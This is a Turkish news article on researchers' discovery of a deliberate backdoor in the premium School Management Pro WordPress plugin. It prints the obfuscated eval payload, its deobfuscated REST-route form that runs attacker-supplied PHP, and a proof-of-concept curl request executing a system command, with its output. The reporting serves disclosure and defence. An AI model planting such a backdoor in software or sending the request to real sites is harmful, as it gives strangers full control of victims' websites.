Cuma, Haziran 14, 2024
Ana SayfaTeknoloji HaberleriAraştırmacılar, okullar tarafından kullanılan WordPress eklentisinde gizlenen arka kapı buluyor

Araştırmacılar, okullar tarafından kullanılan WordPress eklentisinde gizlenen arka kapı buluyor

Çizgi film kapısı, bilgisayar kodundan oluşan bir duvara açılır.

Araştırmacılar Cuma günü, bir WordPress eklentisinde, saldırganlara, okullara pazarlanan paketi kullanan web siteleri üzerinde tam kontrol sağlayan kötü niyetli bir arka kapı bulduklarını söyledi.

Okulların web sitelerini işletmek ve yönetmek için kullandıkları bir eklenti olan Okul Yönetimi’nin premium sürümü, en az 8.9 sürümünden bu yana arka kapıyı içeriyor, web sitesi güvenlik hizmeti JetPack’teki araştırmacılar, önceki sürümlerde mevcut olduğunu reddetmeden bir blog yazısında söyledi. . Üçüncü taraf bir siteden alınan bu sayfa, 8.9 sürümünün geçen Ağustos ayında yayınlandığını gösteriyor.

bariz arka kapı

Jetpack, WordPress.com’daki destek ekibi üyelerinin School Management Pro’yu kullanan birkaç sitede oldukça karmaşık kod bulduğunu bildirmesinin ardından arka kapıyı keşfettiğini söyledi. Gizlemeyi kaldırdıktan sonra, eklentinin lisans kontrol bölümünde saklanan kodun, sitelerin kontrolünü yabancılara verme yeteneği vermek amacıyla kasıtlı olarak oraya yerleştirildiğini fark ettiler.

JetPack gönderisinde, “Kodun kendisi o kadar da ilginç değil: eklentinin lisans kontrol koduna enjekte edilen bariz bir arka kapı” dedi. “Herhangi bir saldırganın, eklentinin yüklü olduğu sitede rastgele PHP kodu yürütmesine izin verir.”

Gizlenmiş haliyle kod şuna benziyordu:

}
$_fc = eval("x65x76x61x6c(x67x7a".chr($_x = 0x70 - 7).chr($_x += 5).chr($_x -= 8) . "x6cx61x74" . "x65x28x62"."x61x73x65x36"."x34x5fx64x65x63x6fx64x65x28'fY9BasMwEEXX8ikmECIbnAukJJAW77ooSaCLUsTYHjsilu2O5JRQfPdKDs2mbbTQQu/9mS8sS4WF010bg2SyTmGvlW61kylUQ3tFCXxFgqnW1hGrSeNucBRHQkg0S0MmJ/YJ2eiCWksy9QSZ8RIUIQ25Y1daCbDewOuL2mX7g9oTn4lXq6ddtj1sH5+zdHILbJoci5MM7q0CzJk+Br8ZpjL+zJFrC+sbWG5qcqpHRmPj5GFydAUxaGvJ+QHBf5N5031W2h7lu5+0WMAMyPTu8i//I303OsGfjoLO2Pzm13JjuMfw6SQS/m304Bs="" . str_repeat(chr(0x29), 3)."x3b");
class WLSM_Crypt_Blowfish_DefaultKey

Gizlemenin kaldırılmasından sonra kod şuydu:

add_action( "rest_api_init', function() {
        register_rest_route(
                'am-member', 'license',
                array(
                        'methods'  => WP_REST_Server::CREATABLE,
                        'callback' => function( $request ) {
                                $args = $request->get_params();
                                if ( isset( $args['blowfish'] ) && ! empty( $args['blowfish'] ) && isset( $args['blowf'] ) && ! empty( $args['blowf'] ) ) {
                                        eval( $args['blowf'] );
                                }
                        },
                )
        );
} );

Araştırmacılar, gizlenmiş kodun gerçekten de, bilgisi olan herkesin eklentiyi çalıştıran herhangi bir sitede kendi seçtikleri kodu yürütmesine izin veren bir arka kapı olduğunu doğrulayan bir kavram kanıtı açığı yazdı.

$ curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Warning: Cannot modify header information - headers already sent by (output started at /var/www/html/wp-content/plugins/school-management-pro-9.9.4/admin/inc/manager/WLSM_LC.php(683) : eval()'d code(1) : eval()'d code(9) : eval()'d code:1) in /var/www/html/wp-includes/rest-api/class-wp-rest-server.php on line 1713

gizem kalır

Eklentiyi kaç sitenin kullandığı belli değil. Hindistan merkezli School Management üreticisi Weblizar, ana sayfasında ücretsiz ve premium temaları ve eklentileri için “340k +” müşterisi olduğunu, ancak bulunan arka kapı JetPack’in yalnızca School Management Pro’da olduğunu söylüyor. Arka kapı, eklentinin ücretsiz sürümünde yoktu ve Weblizar’ın yayınladığı diğer eklentilere eklendiğine dair hiçbir belirti yok.

Gönderi, “Satıcıdan arka kapının ne zaman enjekte edildiği, hangi sürümlerin etkilendiği ve kodun ilk etapta eklentiye nasıl geldiği hakkında daha fazla bilgi almaya çalıştık” dedi. “Satıcı, kodun yazılımlarına ne zaman veya nasıl geldiğini bilmediğini söylediği için bu çaba başarısız oldu.”

Weblizar’a ulaşma girişimleri başarılı olmadı.

Artık arka kapının varlığı herkesin bildiği bir şey olduğundan, saldırganların eklentinin savunmasız bir sürümünü kullanan herhangi bir web sitesinde bundan yararlanma olasılığı yüksektir. Bu eklentiyi kullanan herkes hemen güncelleme yapmalıdır. Güncelleme eklenmiş olabilecek yeni arka kapıları kaldırmayacağından, yama uygulandıktan sonra bile, sitelerini güvenlik ihlali belirtileri için dikkatlice taramalıdırlar.

RELATED ARTICLES

Popüler Konular